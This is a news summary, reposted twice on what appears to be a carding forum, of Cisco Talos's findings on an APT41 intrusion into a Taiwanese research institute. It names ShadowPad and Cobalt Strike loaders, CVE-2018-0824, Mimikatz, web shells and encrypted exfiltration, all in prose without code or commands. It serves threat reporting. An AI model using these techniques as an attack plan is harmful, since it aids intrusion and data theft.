Carding Forum
Professional
- Messages
- 2,788
- Reaction score
- 1,175
- Points
- 113
Cyber Spies used sophisticated disguise schemes to hide their actions.
A government-affiliated research institute in Taiwan has fallen victim to a cyberattack identified by Cisco Talos. The attack, which occurred in July 2023, infected the institute's systems with ShadowPad and Cobalt Strike malware. Experts associate this campaign with the hacker group APT41, which, according to the US authorities, has ties to China.
Cisco Talos detected abnormal PowerShell commands connecting to the IP address to download and execute scripts. The ShadowPad malware used a vulnerable version of the Microsoft Office IME to launch its bootloader. APT41 also created a special boot loader to exploit the vulnerability CVE-2018-0824, which allows you to get a local privilege escalation.
The researchers note that the methods and tools used correspond to those typical for APT41, including the use of ShadowPad, Bitdefender and FileZilla. Although the final malicious code of ShadowPad has not been found, it is known that ShadowPad is used exclusively by Chinese hacker groups.
Cobalt Strike, which was detected during the attack, was developed using the CS-Avoid-Killing loader, aimed at avoiding detection by antivirus programs. The loader is written in Go and contains strings in simplified Chinese, which confirms the involvement of Chinese hackers.
During the attack, the attackers compromised three hosts in the target network and were able to upload valuable documents. Hackers installed web shells, used RDP and reverse shells to spread malware.
APT41 also used password collection tools, including Mimikatz and WebBrowserPassView. Hackers executed commands to get information about users, directory structures, and network configurations. To exfiltrate the data, the criminals compressed and encrypted the files using 7zip, and then sent them to the command server.
During the campaign analysis, two types of ShadowPad loaders were found. The first one used an old version of Microsoft Office IME, the second one was developed using the vulnerable Bitdefender library. Both types of boot loaders used legitimate binaries to run malicious code.
The investigation found interesting tools used by hackers, including UnmarshalPwn to exploit CVE-2018-0824. Other infrastructure components used in different campaigns by the same group of hackers were also identified.
The increasing complexity of APT41's methods and tools signals a growing threat to organizations around the world. This incident highlights the critical need for companies and institutions to continually improve their cybersecurity systems, regularly update software, and conduct vulnerability audits.
Source
A government-affiliated research institute in Taiwan has fallen victim to a cyberattack identified by Cisco Talos. The attack, which occurred in July 2023, infected the institute's systems with ShadowPad and Cobalt Strike malware. Experts associate this campaign with the hacker group APT41, which, according to the US authorities, has ties to China.
Cisco Talos detected abnormal PowerShell commands connecting to the IP address to download and execute scripts. The ShadowPad malware used a vulnerable version of the Microsoft Office IME to launch its bootloader. APT41 also created a special boot loader to exploit the vulnerability CVE-2018-0824, which allows you to get a local privilege escalation.
The researchers note that the methods and tools used correspond to those typical for APT41, including the use of ShadowPad, Bitdefender and FileZilla. Although the final malicious code of ShadowPad has not been found, it is known that ShadowPad is used exclusively by Chinese hacker groups.
Cobalt Strike, which was detected during the attack, was developed using the CS-Avoid-Killing loader, aimed at avoiding detection by antivirus programs. The loader is written in Go and contains strings in simplified Chinese, which confirms the involvement of Chinese hackers.
During the attack, the attackers compromised three hosts in the target network and were able to upload valuable documents. Hackers installed web shells, used RDP and reverse shells to spread malware.
APT41 also used password collection tools, including Mimikatz and WebBrowserPassView. Hackers executed commands to get information about users, directory structures, and network configurations. To exfiltrate the data, the criminals compressed and encrypted the files using 7zip, and then sent them to the command server.
During the campaign analysis, two types of ShadowPad loaders were found. The first one used an old version of Microsoft Office IME, the second one was developed using the vulnerable Bitdefender library. Both types of boot loaders used legitimate binaries to run malicious code.
The investigation found interesting tools used by hackers, including UnmarshalPwn to exploit CVE-2018-0824. Other infrastructure components used in different campaigns by the same group of hackers were also identified.
The increasing complexity of APT41's methods and tools signals a growing threat to organizations around the world. This incident highlights the critical need for companies and institutions to continually improve their cybersecurity systems, regularly update software, and conduct vulnerability audits.
Source
